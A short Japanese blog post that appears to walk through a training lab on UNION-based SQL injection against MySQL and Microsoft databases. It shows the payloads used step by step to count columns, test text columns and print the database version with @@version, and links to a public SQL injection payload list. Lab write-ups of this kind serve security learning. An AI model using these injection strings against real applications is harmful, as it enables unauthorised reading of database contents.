shikata ga nai

Private? There is no such things.

SQL injection attack, querying the database type and version on MySQL and Microsoftをやってみた

Hello there, ('ω')ノ

 

MySQLとMicrosoftのデータベースタイプとバージョンのクエリを。

このラボには、SQLインジェクションの脆弱性があって。

UNION攻撃を使用して、挿入されたクエリから結果を取得できるらしく。

 

まずは、ページにアクセスして。

 

f:id:ThisIsOne:20210406181124p:plain

 

まずは、カラム数の確認から。

 '+UNION+SELECT+NULL,NULL--

 

f:id:ThisIsOne:20210406181249p:plain

 

コメントタイプを変更すると正常なレスポンスが返ってきて。

 '+UNION+SELECT+NULL,NULL#

 

f:id:ThisIsOne:20210406181320p:plain

 

次にカラムのデータ形式でテキストデータを確認して。

 '+UNION+SELECT+'abc','def'#

 

f:id:ThisIsOne:20210406181410p:plain

 

最後に下記のペイロードでデータベースのバージョンを表示して。

 '+UNION+SELECT+@@version,NULL#

 

f:id:ThisIsOne:20210406181521p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210406181540p:plain

 

SQLインジェクションのペイロードもWEB上にあって。

これらを参考に組み立てていけばよいかと。

 https://github.com/payloadbox/sql-injection-payload-list

 

f:id:ThisIsOne:20210406183224p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain